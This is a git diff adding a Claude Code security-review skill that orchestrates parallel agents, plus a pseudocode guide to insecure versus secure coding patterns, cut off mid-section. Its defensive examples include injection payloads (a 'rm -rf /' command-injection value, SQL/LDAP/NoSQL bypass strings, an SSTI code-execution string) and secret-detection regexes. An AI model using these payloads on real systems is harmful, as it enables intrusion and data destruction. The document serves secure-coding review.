diff --git a/.DS_Store b/.DS_Store new file mode 100644 index 0000000..9f8ad30 Binary files /dev/null and b/.DS_Store differ diff --git a/.claude/.DS_Store b/.claude/.DS_Store new file mode 100644 index 0000000..31980e2 Binary files /dev/null and b/.claude/.DS_Store differ diff --git a/.claude/skills/security-review-swarm/SKILL.md b/.claude/skills/security-review-swarm/SKILL.md new file mode 100644 index 0000000..9b6c148 --- /dev/null +++ b/.claude/skills/security-review-swarm/SKILL.md @@ -0,0 +1,396 @@ +--- +name: security-review-swarm +description: Comprehensive security code review using parallel agent swarms. Use this skill when performing security audits, vulnerability assessments, or pre-deployment security reviews on codebases. Triggers include: "security review", "security audit", "vulnerability scan", "find vulnerabilities", "check for security issues", "pentest the code", "audit authentication", "review for injection", "check for XSS", "credential scan", or any request involving security analysis of code. Supports both quick breadth scans and deep audits using specialized parallel agents for secrets, injection, XSS, authentication, cryptography, input validation, and dependency analysis. +--- + +# Security Review Swarm + +Orchestrates parallel security review agents using Claude Code's TeammateTool and Task system for comprehensive vulnerability detection. + +## Usage Patterns + +``` +/security-review # Quick breadth review of staged/recent changes +/security-review src/ # Review specific directory (breadth) +/security-review --deep # Deep audit with parallel specialists +/security-review --deep src/auth/ # Deep audit of specific path +/security-review --full # Complete swarm: all specialists in parallel +``` + +## Review Modes + +| Mode | Agents | Patterns | Use Case | +|------|--------|----------|----------| +| **Quick** (default) | 1 | 25+ breadth | PRs, quick scans, daily reviews | +| **Deep** (`--deep`) | 1 | 7 critical depth | Auth, crypto, payments, pre-launch | +| **Full** (`--full`) | 7 parallel | All patterns | Complete security audit | + +## Orchestration Instructions + +### Mode 1: Quick Review (Default) + +Single-agent review using BREADTH patterns: + +1. Load `references/ANTI_PATTERNS_BREADTH.md` +2. Determine scope (file path, `git diff HEAD~1`, or `git diff --cached`) +3. Analyze against all 25+ patterns, prioritizing: + - §1: Secrets and Credentials + - §2: Injection (SQL, Command, NoSQL) + - §3: XSS (Reflected, Stored, DOM) + - §4: Authentication & Sessions +4. Report findings in standard format + +### Mode 2: Deep Review (`--deep`) + +Single-agent deep dive using DEPTH patterns: + +1. Load `references/ANTI_PATTERNS_DEPTH.md` +2. For each of the 7 critical patterns, check: + - Multiple manifestation examples + - Edge cases section + - Common mistakes section + - Detection hints +3. Include security checklists in report + +### Mode 3: Full Swarm Review (`--full`) + +Parallel specialist agents for comprehensive coverage: + +```pseudocode +// 1. Create review team +Teammate({ operation: "spawnTeam", team_name: "security-review-{timestamp}" }) + +// 2. Create task queue for findings aggregation +TaskCreate({ subject: "Aggregate Findings", description: "Collect all specialist reports" }) + +// 3. Spawn 7 parallel specialists +specialists = [ + {name: "secrets-scanner", focus: "Pattern 1: Hardcoded Secrets"}, + {name: "injection-hunter", focus: "Pattern 2: SQL/Command Injection"}, + {name: "xss-detector", focus: "Pattern 3: Cross-Site Scripting"}, + {name: "auth-auditor", focus: "Pattern 4: Authentication & Sessions"}, + {name: "crypto-reviewer", focus: "Pattern 5: Cryptographic Failures"}, + {name: "input-validator", focus: "Pattern 6: Input Validation"}, + {name: "dependency-checker", focus: "Pattern 7: Dependencies & Supply Chain"} +] + +FOR specialist IN specialists: + Task({ + team_name: team_name, + name: specialist.name, + subagent_type: "general-purpose", + prompt: buildSpecialistPrompt(specialist, targetPath, context), + run_in_background: true + }) + +// 4. Wait for all specialists to report +// 5. Synthesize findings into unified report +// 6. Cleanup team +``` + +## Specialist Prompts + +### Secrets Scanner Agent + +``` +You are a security specialist focused on credential and secrets exposure. + +SCOPE: {target_path} + +Review for Pattern 1 (Hardcoded Secrets) from the security anti-patterns guide: + +CHECK FOR: +1. API keys, tokens, passwords in source code +2. Database connection strings with embedded credentials +3. JWT secrets and signing keys +4. Private keys (RSA, EC, SSH) +5. OAuth client secrets (especially in frontend code) +6. AWS/GCP/Azure credentials +7. Secrets in CI/CD configs, Docker files, environment files +8. Credentials leaked in logs or error messages +9. Test credentials that could work in production +10. Secrets in URL query parameters + +DETECTION PATTERNS: +- Variables named: password, secret, key, token, credential, api_key +- Patterns: sk_live_, sk_test_, ghp_, gho_, AKIA, AIza +- Private key markers: -----BEGIN (RSA|EC|DSA|OPENSSH)?PRIVATE KEY----- +- Connection strings: (mysql|postgresql|mongodb|redis)://[^:]+:[^@]+@ + +Send findings to team-lead with: +- File path and line number +- CWE reference (CWE-798, CWE-259, CWE-321) +- Severity (Critical/High) +- Specific remediation +``` + +### Injection Hunter Agent + +``` +You are a security specialist focused on injection vulnerabilities. + +SCOPE: {target_path} + +Review for Pattern 2 (Injection) from the security anti-patterns guide: + +CHECK FOR: +1. SQL queries with string concatenation or interpolation +2. Dynamic table/column names without allowlist +3. ORDER BY, LIMIT clauses with user input +4. Shell commands constructed with user data +5. LDAP filter construction +6. XPath query building +7. NoSQL query injection ($ne, $gt operators from user input) +8. Template injection (SSTI) +9. Second-order injection (stored data used unsafely later) +10. ORM raw queries without parameterization + +DETECTION PATTERNS: +- String concat in queries: (SELECT|INSERT|UPDATE|DELETE).*(\+|concat|\${|f['"]) +- Shell with variables: (system|exec|subprocess).*(\+|\${) +- shell=True usage + +Send findings to team-lead with CWE-89, CWE-78, CWE-90, CWE-643 references. +``` + +### XSS Detector Agent + +``` +You are a security specialist focused on Cross-Site Scripting. + +SCOPE: {target_path} + +Review for Pattern 3 (XSS) from the security anti-patterns guide: + +CHECK FOR: +1. innerHTML, document.write with user data +2. React dangerouslySetInnerHTML without sanitization +3. Vue v-html directive with user input +4. Angular bypassSecurityTrust* usage +5. Template |safe, {{{ }}} (triple braces), <%- %> patterns +6. User input in HTML attributes (especially event handlers) +7. JavaScript context injection +8. URL context (javascript:, data: schemes) +9. CSS context injection +10. Missing Content-Security-Policy headers + +CONTEXT-SPECIFIC ENCODING CHECK: +- HTML body: < > & " ' +- Attributes: Above + ` = +- JavaScript: \\' \\" \\n \\x3c \\x3e +- URL: encodeURIComponent + +Send findings to team-lead with CWE-79, CWE-80, CWE-83 references. +``` + +### Auth Auditor Agent + +``` +You are a security specialist focused on authentication and session security. + +SCOPE: {target_path} + +Review for Pattern 4 (Authentication) from the security anti-patterns guide: + +CHECK FOR: +1. Weak password validation (length only, no breach check) +2. Predictable session tokens (sequential, timestamp-based) +3. Session not regenerated after login (fixation) +4. JWT "none" algorithm acceptance +5. Weak JWT secrets (< 256 bits) +6. Tokens in localStorage (XSS exposure) +7. Missing token expiration +8. No rate limiting on auth endpoints +9. Insecure password reset flows +10. Missing MFA for sensitive operations + +SESSION SECURITY: +- HttpOnly, Secure, SameSite cookie flags +- Session invalidation on logout +- Concurrent session handling + +Send findings to team-lead with CWE-287, CWE-384, CWE-613, CWE-307 references. +``` + +### Crypto Reviewer Agent + +``` +You are a security specialist focused on cryptographic implementations. + +SCOPE: {target_path} + +Review for Pattern 5 (Cryptographic Failures) from the security anti-patterns guide: + +CHECK FOR: +1. Deprecated algorithms (MD5, SHA1 for security, DES, RC4) +2. Hardcoded encryption keys +3. ECB mode usage (reveals patterns) +4. Missing or predictable IVs/nonces +5. Custom/"homegrown" crypto implementations +6. Math.random() for security tokens +7. Weak key derivation (direct hash vs PBKDF2/Argon2) +8. Insufficient key lengths (< 256 bits for symmetric) +9. Password storage without bcrypt/argon2 +10. Missing authenticated encryption (use GCM, not CBC alone) + +SECURE ALTERNATIVES: +- Passwords: bcrypt, Argon2id, scrypt +- Symmetric: AES-256-GCM, ChaCha20-Poly1305 +- Hashing: SHA-256, SHA-3, BLAKE2 +- Random: secrets module, crypto.randomBytes + +Send findings to team-lead with CWE-327, CWE-328, CWE-330, CWE-326 references. +``` + +### Input Validator Agent + +``` +You are a security specialist focused on input validation. + +SCOPE: {target_path} + +Review for Pattern 6 (Input Validation) from the security anti-patterns guide: + +CHECK FOR: +1. Client-side only validation +2. Missing type checking (especially for NoSQL) +3. No length limits (DoS via large inputs) +4. ReDoS patterns: (a+)+, (a*)* +5. Trusting external data without verification +6. Missing canonicalization before validation +7. Path traversal (../ in file paths) +8. Missing URL scheme validation +9. Accepting untrusted serialized data (pickle, eval) +10. XML without entity restrictions (XXE) + +VALIDATION ORDER: +1. Decode all encoding layers +2. Canonicalize (normalize unicode, resolve paths) +3. Validate against allowlist +4. Encode for output context + +Send findings to team-lead with CWE-20, CWE-22, CWE-1333 references. +``` + +### Dependency Checker Agent + +``` +You are a security specialist focused on supply chain and dependency security. + +SCOPE: {target_path} + +Review for Pattern 7 (Dependencies) from the security anti-patterns guide: + +CHECK FOR: +1. Hallucinated/non-existent packages +2. Typosquatting package names +3. Outdated dependencies with known CVEs +4. Unpinned dependency versions +5. Dependencies from untrusted sources +6. Excessive dependency permissions +7. Dev dependencies in production +8. Deprecated packages +9. Low-maintenance packages (last update > 2 years) +10. Suspicious post-install scripts + +VERIFY PACKAGES EXIST: +- npm: https://registry.npmjs.org/{package} +- PyPI: https://pypi.org/pypi/{package}/json +- Check download counts and maintenance status + +Send findings to team-lead with CWE-1357 (Slopsquatting) references. +``` + +## Report Format + +```markdown +## Security Review Results + +**Scope:** {files/directories reviewed} +**Mode:** {quick|deep|full} +**Agents:** {list of specialists if full mode} +**Duration:** {time taken} + +### Summary + +| Severity | Count | Categories | +|----------|-------|------------| +| Critical | X | Secrets, Injection | +| High | X | Auth, XSS | +| Medium | X | Config, Input | + +### Critical Issues +{Must fix before deployment} + +### High Priority +{Fix soon} + +### Medium Priority +{Address when convenient} + +### Findings by Category + +#### 1. Secrets & Credentials +[Findings from secrets-scanner] + +#### 2. Injection Vulnerabilities +[Findings from injection-hunter] + +... {continue for each category} + +### Good Practices Found +{Positive patterns already in place} + +--- + +### Detailed Findings + +#### {Issue Title} +- **File:** `path/to/file.ts:123` +- **CWE:** CWE-XXX (Name) +- **Severity:** Critical/High/Medium +- **Agent:** {specialist name} +- **Pattern:** Brief description +- **Code:** + ``` + {vulnerable code snippet} + ``` +- **Fix:** + ``` + {remediated code} + ``` +- **Reference:** ANTI_PATTERNS_{BREADTH|DEPTH}.md §{section} +``` + +## Auto-Escalation Rules + +Automatically use DEPTH patterns (even without `--deep`) when reviewing: + +- `**/auth/**`, `**/login/**`, `**/session/**` +- `**/payment/**`, `**/stripe/**`, `**/billing/**` +- `**/crypto/**`, `**/encrypt/**`, `**/token/**` +- Files containing: `password`, `secret`, `jwt`, `bcrypt`, `oauth` + +Automatically use FULL swarm (even without `--full`) when: + +- Reviewing > 50 files +- Pre-production/release audit requested +- Scope includes authentication + payments + API +- User mentions "comprehensive" or "complete" audit + +## Team Lifecycle + +```pseudocode +// Full swarm cleanup sequence +FOR specialist IN active_specialists: + Teammate({ operation: "requestShutdown", target_agent_id: specialist.name }) + // Wait for shutdown_approved message + +// Verify all shutdown before cleanup +Teammate({ operation: "cleanup" }) +``` + +## References + +- `references/ANTI_PATTERNS_BREADTH.md` - 25+ patterns, ~65K tokens +- `references/ANTI_PATTERNS_DEPTH.md` - 7 critical patterns with edge cases, ~100K tokens diff --git a/.claude/skills/security-review-swarm/references/ANTI_PATTERNS_BREADTH.md b/.claude/skills/security-review-swarm/references/ANTI_PATTERNS_BREADTH.md new file mode 100644 index 0000000..215304f --- /dev/null +++ b/.claude/skills/security-review-swarm/references/ANTI_PATTERNS_BREADTH.md @@ -0,0 +1,7315 @@ +--- +type: reference +title: AI Code Security Anti-Patterns - Breadth Version +created: 2026-01-18 +version: 1.0.0 +tags: + - security + - anti-patterns + - ai-generated-code + - llm + - secure-coding +related: + - "[[ANTI_PATTERNS_DEPTH]]" + - "[[Ranking-Matrix]]" + - "[[Pseudocode-Examples]]" +--- + +# AI Code Security Anti-Patterns +## Breadth Version - Comprehensive Coverage + +> **Purpose:** Security anti-patterns guide for AI-assisted code generation +> **Audience:** Any LLM system prompt, RAG system, or context file +> **Format:** Pseudocode examples (implement in your target language) +> **How to use:** Include in system prompt or reference during code generation + +--- + +## INSTRUCTIONS FOR AI/LLM + +This document contains security anti-patterns you MUST avoid when generating code. +Each section shows a VULNERABLE pattern (marked BAD) and a SECURE alternative (marked GOOD). +All examples are in PSEUDOCODE - implement the secure patterns in whatever language +the developer is using. When in doubt, choose the more secure option. + +**Key Statistics:** +- AI-generated code has an **86% XSS failure rate** (vs 31.6% human code) +- **5-21% of AI-suggested packages don't exist** (slopsquatting risk) +- AI code is **2.74x more likely** to have XSS vulnerabilities +- **21.7% hallucination rate** for package names in some domains +- SQL injection patterns appeared "thousands of times" in AI training data + +**Before generating any code:** +1. Never hardcode credentials, API keys, or secrets +2. Always parameterize database queries +3. Validate and sanitize all user input +4. Use cryptographically secure random for security tokens +5. Verify packages exist before suggesting imports +6. Encode output for the appropriate context (HTML, URL, JS) + +--- + +## Quick Reference Table + +| Pattern | CWE | Severity | Quick Fix | +|---------|-----|----------|-----------| +| Hallucinated Packages | CWE-1357 | Critical | Verify packages exist before import | +| XSS (Reflected/Stored/DOM) | CWE-79 | Critical | Encode output for context | +| Hardcoded Secrets | CWE-798 | Critical | Use environment variables | +| SQL Injection | CWE-89 | Critical | Use parameterized queries | +| Missing Authentication | CWE-287 | Critical | Apply auth to all protected endpoints | +| Command Injection | CWE-78 | Critical | Use argument arrays, avoid shell | +| Missing Input Validation | CWE-20 | High | Validate type, length, format, range | +| Unrestricted File Upload | CWE-434 | Critical | Validate extension, MIME, and size | +| Insufficient Randomness | CWE-330 | High | Use secrets module for tokens | +| Missing Rate Limiting | CWE-770 | High | Implement per-IP/user limits | +| Excessive Data Exposure | CWE-200 | High | Use DTOs with field allowlists | +| Path Traversal | CWE-22 | High | Validate paths within allowed dirs | +| Weak Password Hashing | CWE-327 | High | Use bcrypt/argon2 with salt | +| Log Injection | CWE-117 | Medium | Sanitize newlines, use structured logging | +| Debug Mode in Production | CWE-215 | High | Environment-based configuration | +| Weak Encryption | CWE-326 | High | Use AES-GCM or ChaCha20-Poly1305 | +| Session Fixation | CWE-384 | High | Regenerate session ID on login | +| JWT Misuse | CWE-287 | High | Strong secrets, explicit algorithms | +| Mass Assignment | CWE-915 | High | Allowlist assignable fields | +| Missing Security Headers | CWE-16 | Medium | Add CSP, X-Frame-Options, HSTS | +| Open CORS | CWE-346 | Medium | Restrict to known origins | +| LDAP Injection | CWE-90 | High | Escape special LDAP characters | +| XPath Injection | CWE-643 | High | Use parameterized XPath or validate | +| Insecure Temp Files | CWE-377 | Medium | Use mkstemp with restrictive perms | +| Verbose Error Messages | CWE-209 | Medium | Generic external, detailed internal | + +--- + +## 1. Secrets and Credentials Management + +**CWE References:** CWE-798 (Hard-coded Credentials), CWE-259 (Hard-coded Password) +**Severity:** Critical | **Related:** [[Hardcoded-Secrets]] + +> **Risk:** Secrets committed to version control are scraped within minutes. Leads to cloud resource abuse, data breaches, and significant financial costs. AI frequently generates code with embedded credentials from tutorial examples. + +### 1.1 Hardcoded Passwords and API Keys + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Hardcoded API keys and passwords +// ======================================== +CONSTANT API_KEY = "sk-abcd1234efgh5678ijkl9012mnop3456" +CONSTANT DB_PASSWORD = "super_secret_password" +CONSTANT AWS_ACCESS_KEY = "AKIAIOSFODNN7EXAMPLE" +CONSTANT AWS_SECRET_KEY = "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY" + +FUNCTION call_api(endpoint): + headers = {"Authorization": "Bearer " + API_KEY} + RETURN http.get(endpoint, headers) +END FUNCTION + +// ======================================== +// GOOD: Environment variables +// ======================================== +FUNCTION call_api(endpoint): + api_key = environment.get("API_KEY") + + IF api_key IS NULL: + THROW Error("API_KEY environment variable required") + END IF + + headers = {"Authorization": "Bearer " + api_key} + RETURN http.get(endpoint, headers) +END FUNCTION +``` + +### 1.2 Credentials in Configuration Files + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Credentials in config committed to repo +// ======================================== +// config.json (tracked in git) +{ + "database_url": "postgresql://admin:password123@localhost:5432/mydb", + "redis_password": "redis_secret_123", + "smtp_password": "mail_password" +} + +FUNCTION connect_database(): + config = load_json("config.json") + connection = database.connect(config.database_url) + RETURN connection +END FUNCTION + +// ======================================== +// GOOD: External secret management +// ======================================== +// config.json (no secrets, safe to commit) +{ + "database_host": "localhost", + "database_port": 5432, + "database_name": "mydb" +} + +FUNCTION connect_database(): + config = load_json("config.json") + + // Credentials from environment or secret manager + db_user = environment.get("DB_USER") + db_password = environment.get("DB_PASSWORD") + + IF db_user IS NULL OR db_password IS NULL: + THROW Error("Database credentials not configured") + END IF + + url = "postgresql://" + db_user + ":" + db_password + "@" + + config.database_host + ":" + config.database_port + "/" + config.database_name + RETURN database.connect(url) +END FUNCTION +``` + +### 1.3 Secrets in Client-Side Code + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Secrets exposed in frontend JavaScript +// ======================================== +// frontend.js (served to browser) +CONSTANT STRIPE_SECRET_KEY = "sk_live_abc123..." // Never expose secret keys! +CONSTANT ADMIN_PASSWORD = "admin123" + +FUNCTION charge_card(card_number, amount): + RETURN http.post("https://api.stripe.com/charges", { + api_key: STRIPE_SECRET_KEY, // Visible in browser DevTools! + card: card_number, + amount: amount + }) +END FUNCTION + +// ======================================== +// GOOD: Backend proxy for sensitive operations +// ======================================== +// frontend.js +FUNCTION charge_card(card_token, amount): + // Only send public token, backend handles secret key + RETURN http.post("/api/charges", { + token: card_token, + amount: amount + }) +END FUNCTION + +// backend.js (server-side only) +FUNCTION handle_charge(request): + stripe_key = environment.get("STRIPE_SECRET_KEY") + + RETURN stripe.charges.create({ + api_key: stripe_key, + source: request.token, + amount: request.amount + }) +END FUNCTION +``` + +### 1.4 Insecure Credential Storage + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Storing credentials in plaintext +// ======================================== +FUNCTION save_user_credentials(username, password): + // Dangerous: Plaintext password storage + database.insert("credentials", { + username: username, + password: password // Stored as-is! + }) +END FUNCTION + +FUNCTION save_api_key(user_id, api_key): + // Dangerous: No encryption + database.insert("api_keys", { + user_id: user_id, + key: api_key + }) +END FUNCTION + +// ======================================== +// GOOD: Proper credential protection +// ======================================== +FUNCTION save_user_credentials(username, password): + // Hash passwords with bcrypt + salt = bcrypt.generate_salt(rounds=12) + password_hash = bcrypt.hash(password, salt) + + database.insert("credentials", { + username: username, + password_hash: password_hash + }) +END FUNCTION + +FUNCTION save_api_key(user_id, api_key): + // Encrypt sensitive data at rest + encryption_key = secret_manager.get("DATA_ENCRYPTION_KEY") + encrypted_key = aes_gcm_encrypt(api_key, encryption_key) + + database.insert("api_keys", { + user_id: user_id, + encrypted_key: encrypted_key + }) +END FUNCTION +``` + +### 1.5 Missing Secret Rotation Considerations + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Static secrets with no rotation capability +// ======================================== +CONSTANT JWT_SECRET = "static_jwt_secret_forever" + +FUNCTION create_token(user_id): + // No way to rotate without breaking all existing tokens + RETURN jwt.encode({user: user_id}, JWT_SECRET, algorithm="HS256") +END FUNCTION + +// ======================================== +// GOOD: Versioned secrets supporting rotation +// ======================================== +FUNCTION get_jwt_secret(version=NULL): + IF version IS NULL: + version = environment.get("JWT_SECRET_VERSION", "v1") + END IF + + // Fetch versioned secret from manager + RETURN secret_manager.get("JWT_SECRET_" + version) +END FUNCTION + +FUNCTION create_token(user_id): + current_version = environment.get("JWT_SECRET_VERSION") + secret = get_jwt_secret(current_version) + + payload = { + user: user_id, + secret_version: current_version, // Include version for validation + exp: current_timestamp() + 3600 + } + RETURN jwt.encode(payload, secret, algorithm="HS256") +END FUNCTION + +FUNCTION verify_token(token): + // Decode header to get version + unverified = jwt.decode(token, verify=FALSE) + version = unverified.get("secret_version", "v1") + + secret = get_jwt_secret(version) + RETURN jwt.decode(token, secret, algorithms=["HS256"]) +END FUNCTION +``` + +--- + +## 2. Injection Vulnerabilities + +**CWE References:** CWE-89 (SQL Injection), CWE-78 (OS Command Injection), CWE-90 (LDAP Injection), CWE-643 (XPath Injection), CWE-943 (NoSQL Injection), CWE-1336 (Template Injection) +**Severity:** Critical | **Related:** [[Injection-Vulnerabilities]] + +> **Risk:** Injection vulnerabilities allow attackers to execute arbitrary code, queries, or commands by manipulating user input. AI models frequently generate vulnerable string concatenation patterns from training data containing millions of insecure examples. Always use parameterized queries and avoid dynamic command construction. + +### 2.1 SQL Injection (String Concatenation in Queries) + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: String concatenation in SQL queries +// ======================================== +FUNCTION get_user(username): + // Vulnerable: User input directly concatenated + query = "SELECT * FROM users WHERE username = '" + username + "'" + RETURN database.execute(query) +END FUNCTION + +FUNCTION search_products(category, min_price): + // Vulnerable: Multiple injection points + query = "SELECT * FROM products WHERE category = '" + category + + "' AND price > " + min_price + RETURN database.execute(query) +END FUNCTION + +// Attack: username = "admin' OR '1'='1' --" +// Result: SELECT * FROM users WHERE username = 'admin' OR '1'='1' --' +// This bypasses authentication and returns all users + +// ======================================== +// GOOD: Parameterized queries (prepared statements) +// ======================================== +FUNCTION get_user(username): + // Safe: Parameters are escaped automatically + query = "SELECT * FROM users WHERE username = ?" + RETURN database.execute(query, [username]) +END FUNCTION + +FUNCTION search_products(category, min_price): + // Safe: All parameters bound separately + query = "SELECT * FROM products WHERE category = ? AND price > ?" + RETURN database.execute(query, [category, min_price]) +END FUNCTION + +// With named parameters (preferred for clarity) +FUNCTION get_user_named(username): + query = "SELECT * FROM users WHERE username = :username" + RETURN database.execute(query, {username: username}) +END FUNCTION +``` + +### 2.2 Command Injection (Unsanitized Shell Commands) + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Shell command with user input +// ======================================== +FUNCTION ping_host(hostname): + // Vulnerable: User controls shell command + command = "ping -c 4 " + hostname + RETURN shell.execute(command) +END FUNCTION + +FUNCTION convert_file(input_path, output_format): + // Vulnerable: Multiple injection points + command = "convert " + input_path + " output." + output_format + RETURN shell.execute(command) +END FUNCTION + +// Attack: hostname = "google.com; rm -rf /" +// Result: ping -c 4 google.com; rm -rf / +// This executes the ping AND deletes the filesystem + +// ======================================== +// GOOD: Use argument arrays, avoid shell +// ======================================== +FUNCTION ping_host(hostname): + // Validate input format first + IF NOT is_valid_hostname(hostname): + THROW Error("Invalid hostname format") + END IF + + // Safe: Arguments passed as array, no shell interpolation + RETURN process.execute(["ping", "-c", "4", hostname], shell=FALSE) +END FUNCTION + +FUNCTION convert_file(input_path, output_format): + // Validate allowed formats + allowed_formats = ["png", "jpg", "gif", "webp"] + IF output_format NOT IN allowed_formats: + THROW Error("Invalid output format") + END IF + + // Validate path is within allowed directory + IF NOT path.is_within(input_path, UPLOAD_DIRECTORY): + THROW Error("Invalid file path") + END IF + + output_path = path.join(OUTPUT_DIR, "output." + output_format) + RETURN process.execute(["convert", input_path, output_path], shell=FALSE) +END FUNCTION + +// Helper: Validate hostname format +FUNCTION is_valid_hostname(hostname): + // Only allow alphanumeric, dots, and hyphens + pattern = "^[a-zA-Z0-9][a-zA-Z0-9.-]{0,253}[a-zA-Z0-9]$" + RETURN regex.match(pattern, hostname) +END FUNCTION +``` + +### 2.3 LDAP Injection + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Unescaped LDAP filters +// ======================================== +FUNCTION find_user_by_name(username): + // Vulnerable: User input in LDAP filter + filter = "(uid=" + username + ")" + RETURN ldap.search("ou=users,dc=example,dc=com", filter) +END FUNCTION + +FUNCTION authenticate_ldap(username, password): + // Vulnerable: Both fields injectable + filter = "(&(uid=" + username + ")(userPassword=" + password + "))" + results = ldap.search(BASE_DN, filter) + RETURN results.count > 0 +END FUNCTION + +// Attack: username = "*)(uid=*))(|(uid=*" +// Result: (uid=*)(uid=*))(|(uid=*) +// This can return all users or bypass authentication + +// ======================================== +// GOOD: Escape LDAP special characters +// ======================================== +FUNCTION escape_ldap(input): + // Escape LDAP special characters: * ( ) \ NUL + result = input + result = result.replace("\\", "\\5c") // Backslash first + result = result.replace("*", "\\2a") + result = result.replace("(", "\\28") + result = result.replace(")", "\\29") + result = result.replace("\0", "\\00") + RETURN result +END FUNCTION + +FUNCTION find_user_by_name(username): + // Safe: Input is escaped before use + safe_username = escape_ldap(username) + filter = "(uid=" + safe_username + ")" + RETURN ldap.search("ou=users,dc=example,dc=com", filter) +END FUNCTION + +FUNCTION authenticate_ldap(username, password): + // Better: Use LDAP bind for authentication instead of filter + user_dn = "uid=" + escape_ldap(username) + ",ou=users,dc=example,dc=com" + + TRY: + connection = ldap.bind(user_dn, password) + connection.close() + RETURN TRUE + CATCH LDAPError: + RETURN FALSE + END TRY +END FUNCTION +``` + +### 2.4 XPath Injection + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Unescaped XPath queries +// ======================================== +FUNCTION find_user_xml(username): + // Vulnerable: User input in XPath expression + xpath = "//users/user[name='" + username + "']" + RETURN xml_document.query(xpath) +END FUNCTION + +FUNCTION authenticate_xml(username, password): + // Vulnerable: Both fields injectable + xpath = "//users/user[name='" + username + "' and password='" + password + "']" + result = xml_document.query(xpath) + RETURN result IS NOT EMPTY +END FUNCTION + +// Attack: username = "admin' or '1'='1" +// Result: //users/user[name='admin' or '1'='1'] +// This returns all users, bypassing authentication + +// ======================================== +// GOOD: Parameterized XPath or strict validation +// ======================================== +// Option 1: Use parameterized XPath (if supported) +FUNCTION find_user_xml(username): + xpath = "//users/user[name=$username]" + RETURN xml_document.query(xpath, {username: username}) +END FUNCTION + +// Option 2: Escape XPath special characters +FUNCTION escape_xpath(input): + // Handle quotes by splitting and concatenating + IF input.contains("'") AND input.contains('"'): + // Use concat() for strings with both quote types + parts = input.split("'") + escaped = "concat('" + parts.join("',\"'\",'" ) + "')" + RETURN escaped + ELSE IF input.contains("'"): + RETURN '"' + input + '"' + ELSE: + RETURN "'" + input + "'" + END IF +END FUNCTION + +FUNCTION find_user_xml_escaped(username): + // Validate input format first + IF NOT is_valid_username(username): + THROW Error("Invalid username format") + END IF + + safe_username = escape_xpath(username) + xpath = "//users/user[name=" + safe_username + "]" + RETURN xml_document.query(xpath) +END FUNCTION + +// Option 3: Strict whitelist validation +FUNCTION is_valid_username(username): + // Only allow alphanumeric and limited special chars + pattern = "^[a-zA-Z0-9_.-]{1,64}$" + RETURN regex.match(pattern, username) +END FUNCTION +``` + +### 2.5 NoSQL Injection + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Unvalidated input in NoSQL queries +// ======================================== +FUNCTION find_user_nosql(query_params): + // Vulnerable: User can inject operators + // If query_params = {"username": {"$ne": ""}} + // This returns all users where username is not empty + RETURN mongodb.collection("users").find(query_params) +END FUNCTION + +FUNCTION authenticate_nosql(username, password): + // Vulnerable: Accepts objects, not just strings + query = { + username: username, // Could be {"$gt": ""} + password: password // Could be {"$gt": ""} + } + user = mongodb.collection("users").find_one(query) + RETURN user IS NOT NULL +END FUNCTION + +// Attack via JSON body: +// {"username": {"$gt": ""}, "password": {"$gt": ""}} +// This bypasses authentication by matching any non-empty values + +// ======================================== +// GOOD: Type validation and operator blocking +// ======================================== +FUNCTION find_user_nosql(username): + // Validate input is a string, not an object + IF typeof(username) != "string": + THROW Error("Username must be a string") + END IF + + // Safe: Only string values can be queried + RETURN mongodb.collection("users").find_one({username: username}) +END FUNCTION + +FUNCTION authenticate_nosql(username, password): + // Strict type checking + IF typeof(username) != "string" OR typeof(password) != "string": + THROW Error("Invalid credential types") + END IF + + // Additional: Block MongoDB operators + IF username.starts_with("$") OR password.starts_with("$"): + THROW Error("Invalid characters in credentials") + END IF + + user = mongodb.collection("users").find_one({username: username}) + + IF user IS NULL: + RETURN FALSE + END IF + + // Compare password hash, not plaintext + RETURN bcrypt.verify(password, user.password_hash) +END FUNCTION + +// Sanitize any object to remove operators +FUNCTION sanitize_query(obj): + IF typeof(obj) != "object": + RETURN obj + END IF + + sanitized = {} + FOR key, value IN obj: + // Block all MongoDB operators + IF key.starts_with("$"): + CONTINUE // Skip operator keys + END IF + + IF typeof(value) == "object": + // Recursively sanitize, but block nested operators + IF has_operator_keys(value): + THROW Error("Query operators not allowed") + END IF + END IF + + sanitized[key] = value + END FOR + RETURN sanitized +END FUNCTION +``` + +### 2.6 Template Injection (SSTI) + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: User input in template strings +// ======================================== +FUNCTION render_greeting(username): + // Vulnerable: User input treated as template code + template_string = "Hello, " + username + "!" + RETURN template_engine.render_string(template_string) +END FUNCTION + +FUNCTION render_email(user_template, user_data): + // Dangerous: User-provided template + RETURN template_engine.render_string(user_template, user_data) +END FUNCTION + +// Attack: username = "{{config.SECRET_KEY}}" +// Result: Template engine evaluates and exposes secret key +// Attack: username = "{{''.__class__.__mro__[1].__subclasses__()}}" +// Result: Can achieve remote code execution in some engines + +// ======================================== +// GOOD: Use templates as data, not code +// ======================================== +FUNCTION render_greeting(username): + // Safe: User input passed as data to pre-defined template + template = template_engine.load("greeting.html") + RETURN template.render({username: escape_html(username)}) +END FUNCTION + +// greeting.html (static, not user-provided): +//

Hello, {{ username }}!

